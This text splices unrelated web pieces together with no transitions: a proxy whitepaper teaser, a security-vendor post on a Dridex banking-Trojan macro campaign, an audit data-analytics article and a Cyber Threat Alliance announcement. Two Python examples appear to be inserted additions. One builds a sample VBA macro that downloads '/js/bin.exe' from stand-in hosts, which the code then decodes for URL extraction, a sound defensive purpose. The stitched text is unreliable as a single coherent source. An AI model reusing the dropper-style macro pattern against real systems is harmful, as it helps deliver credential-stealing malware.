Once upon a time, proxies fulfilled a need traditional firewalls could not meet: visibility into web traffic starting with the categorization of HTTP, and later HTTPS, traffic. However, little to no emphasis was put on the vast number of applications utilizing other avenues of accessing corporate networks.
Proxy deployments today have outlived their usefulness and practicality. They have joined a long list of legacy security products that provide limited security capability against today’s advanced threats.
Download this whitepaper to find out more on the shortcomings of proxies, and how a next-generation security platform can provide faster, simpler and more comprehensive security.
In October, we called out a series of attacks installing the Dridex Trojan using macros in Microsoft Word documents. Those attacks continued over the last few months, and in the first two weeks of the new calendar year we’ve seen another new campaign.
To refresh your memory, Dridex is the latest version of the Bugat/Feodo/Cridex banking Trojan. Its core functionality is to steal credentials of online banking websites and allow a criminal to use those credentials to initiate transfers and steal funds. Dridex is currently being distributed through an e-mail campaign that carries a Word Document attachment, which uses built-in macro code to download and execute a copy of the Trojan.
While Dridex targets banks from all over the world, in October the majority of the e-mails we tracked were destined for the United States, with the United Kingdom coming in at a distant second place. This time around the UK comes out on top, with over one third of all attacks observed there.
This change in targeting is also clear in the themes used in each of the attacks. Many of the most common attachment names refer to BACS, or Bankers’ Automated Clearing Services, which is used for bank transfers in the UK. Another group of e-mails claimed to be an invoice from Les Mills UK, a fitness organization. This campaign is likely preying on individuals in the UK who have made New Year’s resolutions to get fit.
In October we had identified just six URLs used by the Word documents to download the Dridex Trojan. In the past two weeks we’ve detected files using 43 different download locations.
Many of these URLs are hosted on compromised websites, but there is no clear pattern to indicate how the attackers are taking control of the websites. However, there are clear groupings of patterns among the download URLs. One group relies on the path “/js/bin.exe” while another uses “mops/pops.php”. These URLs are encoded within the macros included in each file. If you are interested in extracting them, Rodel Mendrez from SpiderLabs wrote a short guide using Python. If you want to take the simpler route, Didier Stevens’ OLE Dump tool has a plug-in that will automatically decode and extract these URLs, as shown below.
Palo Alto Networks WildFire detects all of these macro-based attacks using our sandbox technology. Others can protect themselves by disabling macros in Microsoft Word. Macro-based malware has been around for well over a decade. Most organizations should disable macros by default, enabling them only for trusted files.
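As an added illustration of the URL extraction described above (not code from the post, SpiderLabs or the OLE Dump plug-in), the following Python folds two common VBA string-obfuscation tricks, literal concatenation and Chr() calls, and then groups the recovered URLs by path the way the post does. The macro text, hostnames and the obfuscation style are all constructed assumptions; the post does not state how the real samples encode their URLs.

```python
import re

# Constructed sample of extracted VBA macro source (not a real Dridex sample).
# It emulates string concatenation with & / + and Chr() calls; real macros vary.
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim u1 As String, u2 As String
    u1 = "http://" & "example-compromised-site.test" & Chr(47) & "js" & "/bin.exe"
    u2 = "http://another-site.test/" + "mops/pops.php"
    Call Download(u1)
    Call Download(u2)
End Sub
'''

_CHR = re.compile(r'Chr\((\d+)\)')
_STR = re.compile(r'"([^"]*)"')

def fold_expression(expr):
    """Evaluate a VBA string expression built from literals, Chr(n) and & / + joins."""
    parts = []
    for tok in re.split(r'\s*[&+]\s*', expr.strip()):
        m = _CHR.fullmatch(tok)
        if m:
            parts.append(chr(int(m.group(1))))
            continue
        m = _STR.fullmatch(tok)
        if m:
            parts.append(m.group(1))
    return ''.join(parts)

def extract_urls(macro_text):
    """Fold the right-hand side of each assignment and keep values that are URLs."""
    urls = []
    for line in macro_text.splitlines():
        if '=' not in line:
            continue
        _, _, rhs = line.partition('=')
        value = fold_expression(rhs)
        if re.match(r'https?://', value):
            urls.append(value)
    return urls

def group_by_path(urls):
    """Group URLs by path, mirroring the '/js/bin.exe' vs 'mops/pops.php' split."""
    groups = {}
    for u in urls:
        _, _, path = u.split('://', 1)[1].partition('/')
        groups.setdefault('/' + path, []).append(u)
    return groups
```

Feed it the macro source that oledump or olevba extracts rather than the raw .doc; it only understands the two obfuscation forms it emulates.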
Although most would agree that internal audit is an assurance function, I like to think of internal auditors as value-added trusted advisors. A given mandate will provide assurance on processes that are functioning appropriately; however, the real value is in identifying areas of improvement that add tangible value back to the organisation. Data analytics has long been my tool of choice to help accomplish this value in an effective and efficient manner.
At ISACA’s 2015 North America Computer Audit, Control and Security (CACS) conference, I will be presenting alongside Bob Cuthbertson, COO of CaseWare IDEA Inc., on successful integration of data analytics within a risk-based IT audit universe. In a prelude to our session, I would like to provide examples from my own work in the past that I will be adding to, along with others, during the session on 16 March in Orlando, Florida.
Getting Started—Scoping the Audit Engagement
Understanding the business is the first and most crucial step in the audit process. It is what determines the amount of value you can potentially provide to key stakeholders. As shown in scenario 1 below, data analytics can be used before the audit begins as a status indicator of the risks facing an organization. With this information, internal audit is able to improve audit effectiveness as well, with the ultimate aim of providing value to the organisation.
Scenario 1: Driving the Audit Scope
Areas of Risk Identified:
Change Management
Project Management
Challenge: Time limitations allowed only one area of focus for the audit year.
Solution: High-level analytics of change logs and project management databases uncovered significant internal development projects.
Results: The System Development Life Cycle (SDLC) process was therefore identified as an area of immediate value to the organization.
Homing in on Insights Gained (Audit Execution)
To save time and resources, the use of data analytics in the planning phase helps develop greater understanding of where the hotspots are in terms of risk. Outlined in scenario 2 below, utilizing 100 percent of the available data enables internal audit to truly focus and identify anomalies within areas that have been identified as high risk.
Scenario 2: Testing Compliance
Mandate: Operational efficiency—IT help desk tickets
Challenge: More than 140,000 tickets were opened and closed during the year.
Solution: Use data analytics to identify trends to ensure the IT department meets the service level requirements—as delineated in the service level agreement (SLA).
Steps:
Obtain an extract from the ticket management system (Footprints). Confirm data completeness by verifying record count on screen (from the system) to the csv dump.
Execute a trend analysis based on tickets closed by employee, criticality and category type, amount of time from “Ticket Open date” to “Ticket Close date.”
Confirm compliance to SLA.
Results: The analytics showed that the IT group was in compliance with the agreed-upon SLA. Encouragingly, management was very interested in our data analysis, which led to the development of a dashboard for both operational efficiency (which was performed manually at the time by the director) and employee performance. The employee performance KPIs were then linked to their respective annual evaluations for a more objective evaluation of the core performance of the help desk employee.
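The three steps of scenario 2, as an added worked example in Python that is not from the author or from CaseWare IDEA: a completeness check of the CSV dump against the on-screen record count, a trend of resolution time by employee or criticality, and a compliance check against an SLA. The ticket rows and the SLA hour limits are constructed assumptions, not the organisation's real data or agreement.

```python
import csv
import io
from datetime import datetime

# Constructed sample extract (not real Footprints data): one row per ticket.
TICKETS_CSV = """ticket_id,employee,criticality,category,open_date,close_date
1001,alice,High,Access,2014-03-03 09:00,2014-03-03 11:30
1002,bob,Low,Hardware,2014-03-03 10:00,2014-03-10 16:00
1003,alice,Medium,Software,2014-03-04 08:15,2014-03-05 17:45
1004,carol,High,Network,2014-03-04 13:00,2014-03-05 09:00
1005,bob,Low,Software,2014-03-05 11:00,2014-03-06 12:00
"""

# Assumed SLA: maximum hours from open to close per criticality (illustrative only).
SLA_HOURS = {"High": 4, "Medium": 48, "Low": 120}
DATE_FMT = "%Y-%m-%d %H:%M"

def load_tickets(csv_text, expected_count):
    """Parse the dump, confirm completeness against the on-screen count, add hours_open."""
    rows = list(csv.DictReader(io.StringIO(csv_text)))
    if len(rows) != expected_count:
        raise ValueError(f"record count mismatch: {len(rows)} in dump vs {expected_count} on screen")
    for r in rows:
        opened = datetime.strptime(r["open_date"], DATE_FMT)
        closed = datetime.strptime(r["close_date"], DATE_FMT)
        r["hours_open"] = (closed - opened).total_seconds() / 3600
    return rows

def trend_by(rows, key):
    """Average resolution hours and ticket count grouped by a field (employee, criticality, category)."""
    agg = {}
    for r in rows:
        tot, n = agg.get(r[key], (0.0, 0))
        agg[r[key]] = (tot + r["hours_open"], n + 1)
    return {k: (round(tot / n, 2), n) for k, (tot, n) in agg.items()}

def sla_breaches(rows):
    """Ticket ids whose resolution time exceeds the SLA limit for their criticality."""
    return [r["ticket_id"] for r in rows if r["hours_open"] > SLA_HOURS[r["criticality"]]]
```

On the sample, tickets 1002 and 1004 breach their limits; an empty breach list is the evidence of SLA compliance the scenario reports.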
Reporting Results
The insights found during the audit execution are what allow you to create a report that will provide value to the organization. They are the first step to providing a tangible root cause analysis and shedding light on the compliance and governance failures that matter most to companies.
The reporting phase is crucial when it comes to providing the added value for which we strive. If you have performed your audit effectively, the report will only include validated control deficiencies. The use of data analytics throughout the audit process should allow time to report on exact findings, highlight root causes and provide tangible recommendations. Furthermore, data analytics, namely data visualisation, can be used to convey high amounts of data and information in one image. I always remind myself that information is what the other party receives and not what I say. Therefore, the use of data visualisation to ensure the identified efficiencies make it across to the reader is yet another way in which data analytics helps me become the value-added trusted advisor I strive to be.
Conclusion
We have been using data analytics and attaining value by operating in a systematic and structured manner. We maximize our investment through these efficiencies and are able to provide stakeholders with the answers to questions before they even have them. This can and will continue to increase our value as internal auditors and trusted advisors to the business. During the session at North America CACS in March, I will be expanding on the processes behind these scenarios along with more examples using analytics tactics and visualisation methods. I hope to see you there!
Seren Dagdeviren will present “Building Momentum” at 2015 North America CACS in Orlando, Florida, USA, 16-18 March 2015. For information and to register, visit www.isaca.org/northamericacacs2015.
Today at Palo Alto Networks HQ we hosted the four co-founders of the Cyber Threat Alliance, which includes our own Mark McLaughlin, for a live discussion on CNBC’s Squawk Alley that was squarely focused on how collaboration between security companies is helping customers in the ongoing battle against cyberattackers. Mark and his fellow co-founders also touched on the latest cybersecurity legislation to come out of Washington.
Watch the full interview here, learn more about the Cyber Threat Alliance here and check out a few shots of the behind-the-scenes action at HQ this morning.